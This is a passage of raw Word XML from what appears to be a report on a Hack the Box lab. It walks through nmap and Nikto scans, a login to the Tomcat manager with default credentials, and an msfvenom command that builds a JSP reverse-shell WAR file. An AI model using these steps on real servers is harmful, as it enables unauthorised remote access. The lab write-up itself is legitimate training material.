                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId136"/>
                    <a:srcRect t="-1" r="4442" b="1775"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5476924" cy="1957259"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21335D62" w14:textId="18A0DA1A" w:rsidR="00F53B03" w:rsidRDefault="00F53B03" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="_Toc111363685"/>
      <w:bookmarkStart w:id="468" w:name="_Toc111363822"/>
      <w:bookmarkStart w:id="469" w:name="_Toc111981845"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>120</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Hack the Box IP Address</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-665238741"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[56]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="467"/>
      <w:bookmarkEnd w:id="468"/>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w14:paraId="224C7E0C" w14:textId="7175AB44" w:rsidR="006A3479" w:rsidRDefault="006A3479" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A384650" w14:textId="04D4E64A" w:rsidR="00575D53" w:rsidRDefault="00575D53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The initial enumeration reconnaissance is started using nmap as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087EC42" w14:textId="135F1B4B" w:rsidR="00575D53" w:rsidRDefault="00575D53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00575D53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A9B71C0" wp14:editId="3E9FCBED">
            <wp:extent cx="5731510" cy="1677035"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="760259291" name="Picture 76025929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91" name="Picture 760259291" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1677035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2003F941" w14:textId="4A8634F2" w:rsidR="00F53B03" w:rsidRDefault="00F53B03" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="_Toc111363686"/>
      <w:bookmarkStart w:id="471" w:name="_Toc111363823"/>
      <w:bookmarkStart w:id="472" w:name="_Toc111981846"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>121</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Nmap is run on top ports</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1690821579"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="470"/>
      <w:bookmarkEnd w:id="471"/>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p w14:paraId="31FB0E8A" w14:textId="10E25BB8" w:rsidR="00F53B03" w:rsidRDefault="00F53B03" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D84056E" w14:textId="0ED1062A" w:rsidR="00F53B03" w:rsidRDefault="00575D53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Using Nikto</w:t>
      </w:r>
      <w:r w:rsidR="00EC0D7E">
        <w:t xml:space="preserve"> (a vulnerability scanner)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:r w:rsidR="00FA0E34">
        <w:t xml:space="preserve">IP address and port number, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the landing page of the Apache Tomcat server is available and when the manager app is clicked to open manager the login form together with the login credentials appear as demonstrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>. The default credentials are also available on any search engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D003C3" w14:textId="4C471B05" w:rsidR="00FA0E34" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="526A0789" wp14:editId="580FDCED">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>628650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>28684</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1374512" cy="139781"/>
                <wp:effectExtent l="0" t="0" r="16510" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="760259301" name="Rectangle 760259301"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1374512" cy="139781"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="1905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89B22C" id="Rectangle 760259301" o:spid="_x0000_s1026" style="position:absolute;margin-left:49.5pt;margin-top:2.25pt;width:108.25pt;height:11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" filled="f" strokecolor="#c00000" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00EF212C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0573C8" wp14:editId="507F627F">
            <wp:extent cx="6255195" cy="3077007"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="760259300" name="Picture 76025930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300" name="Picture 760259300" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6272867" cy="3085700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00EF212C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE46E33" w14:textId="254D59BA" w:rsidR="00EF212C" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="_Toc111363687"/>
      <w:bookmarkStart w:id="474" w:name="_Toc111363824"/>
      <w:bookmarkStart w:id="475" w:name="_Toc111981847"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>122</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Nikto finds Username and Password</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1875295820"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="473"/>
      <w:bookmarkEnd w:id="474"/>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w14:paraId="4D11EA2E" w14:textId="77777777" w:rsidR="00EF212C" w:rsidRPr="00EF212C" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54546958" w14:textId="31BEE96B" w:rsidR="00FA0E34" w:rsidRDefault="00FA0E34" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00EF212C">
        <w:t xml:space="preserve">Apache Tomcat </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">webserver is opened as in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682816CC" w14:textId="6CB565DE" w:rsidR="00FA0E34" w:rsidRDefault="00FA0E34" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0E34">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03384DC6" wp14:editId="7151DDC3">
            <wp:extent cx="5764384" cy="3335200"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="17780"/>
            <wp:docPr id="760259293" name="Picture 760259293"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93" name="Picture 760259293" descr="Graphical user interface, application, website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId139"/>
                    <a:srcRect l="6679" r="1687" b="553"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5772806" cy="3340073"/>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611E260" w14:textId="6D67F518" w:rsidR="00EF212C" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="_Toc111363688"/>
      <w:bookmarkStart w:id="477" w:name="_Toc111363825"/>
      <w:bookmarkStart w:id="478" w:name="_Toc111981848"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>123</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Apache Tomcat Webserver is opened</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="872582486"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="476"/>
      <w:bookmarkEnd w:id="477"/>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p w14:paraId="79F9F28E" w14:textId="77777777" w:rsidR="00EF212C" w:rsidRPr="00EF212C" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0240E1" w14:textId="11BB153B" w:rsidR="00FA0E34" w:rsidRDefault="00FA0E34" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using the credentials found above the application manager was opened as shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00EF212C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F2C07B" w14:textId="3F9D374D" w:rsidR="00EF212C" w:rsidRDefault="00C11121" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C93136" wp14:editId="5D27B2A6">
            <wp:extent cx="3858178" cy="801981"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="760259311" name="Picture 7602593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311" name="Picture 760259311" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId140" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="4325" t="10807" r="4002" b="17735"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3872727" cy="805005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54456D0A" w14:textId="2BF83470" w:rsidR="00EF212C" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="_Toc111363689"/>
      <w:bookmarkStart w:id="480" w:name="_Toc111363826"/>
      <w:bookmarkStart w:id="481" w:name="_Toc111981849"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>124</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Authentication Application Manager</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1186828915"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="479"/>
      <w:bookmarkEnd w:id="480"/>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p w14:paraId="63F92272" w14:textId="67751C37" w:rsidR="00EF212C" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C86457" w14:textId="5936E313" w:rsidR="00EF212C" w:rsidRDefault="00EF212C" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> illustrates the </w:t>
      </w:r>
      <w:r w:rsidR="00CF5178">
        <w:t>Web Application Manager open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FE17C2" w14:textId="690B6711" w:rsidR="00FA0E34" w:rsidRDefault="00FA0E34" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA0E34">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="399B3AE3" wp14:editId="1450564C">
            <wp:extent cx="5305389" cy="2789555"/>
            <wp:effectExtent l="19050" t="19050" r="10160" b="10795"/>
            <wp:docPr id="760259295" name="Picture 76025929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95" name="Picture 760259295" descr="Table&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId141"/>
                    <a:srcRect l="1626" r="5801" b="1161"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5305842" cy="2789793"/>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757DDF9F" w14:textId="1B94EF6B" w:rsidR="00CF5178" w:rsidRDefault="00CF5178" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="482" w:name="_Toc111363690"/>
      <w:bookmarkStart w:id="483" w:name="_Toc111363827"/>
      <w:bookmarkStart w:id="484" w:name="_Toc111981850"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>125</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Web Application Manager Running</w:t>
      </w:r>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_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"/>
          <w:id w:val="-1951619070"/>
          <w:placeholder>
            <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00663E33" w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[57]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="482"/>
      <w:bookmarkEnd w:id="483"/>
      <w:bookmarkEnd w:id="484"/>
    </w:p>
    <w:p w14:paraId="1626C2F4" w14:textId="06B0C3EE" w:rsidR="00CF5178" w:rsidRDefault="00CF5178" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0899ED63" w14:textId="55FA4D40" w:rsidR="00CF5178" w:rsidRDefault="00CF5178" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The .WAR file </w:t>
      </w:r>
      <w:r w:rsidR="00E6222A">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> created using ‘msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war &gt; shell.war’ as illustrated in figure </w:t>
      </w:r>
      <w:r w:rsidR="00A3392C">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F51B8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00716147">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A84DA8">
        <w:t xml:space="preserve"> This reverse shell connection is a nonstaged payload that can be caught using the Netcat listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C4DB56" w14:textId="0E4DB540" w:rsidR="00CF5178" w:rsidRDefault="00CF5178" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CF5178">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C0B14D0" wp14:editId="002A4EBA">
            <wp:extent cx="5524979" cy="510584"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="760259304" name="Picture 76025930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304" name="Picture 760259304" descr="Text&#10;&#10;Description automatically generated with medium confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5524979" cy="510584"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="562F0C40" w14:textId="3B93C118" w:rsidR="00A84DA8" w:rsidRDefault="00A84DA8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="485" w:name="_Toc111363691"/>
      <w:bookmarkStart w:id="486" w:name="_Toc111363828"/>
      <w:bookmarkStart w:id="487" w:name="_Toc111981851"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>126</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Creation of the .WAR File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="485"/>
      <w:bookmarkEnd w:id="486"/>
      <w:bookmarkEnd w:id="487"/>
      <w:r w:rsidR="0068269D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD39EF8" w14:textId="77777777" w:rsidR="00800A53" w:rsidRDefault="00800A53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
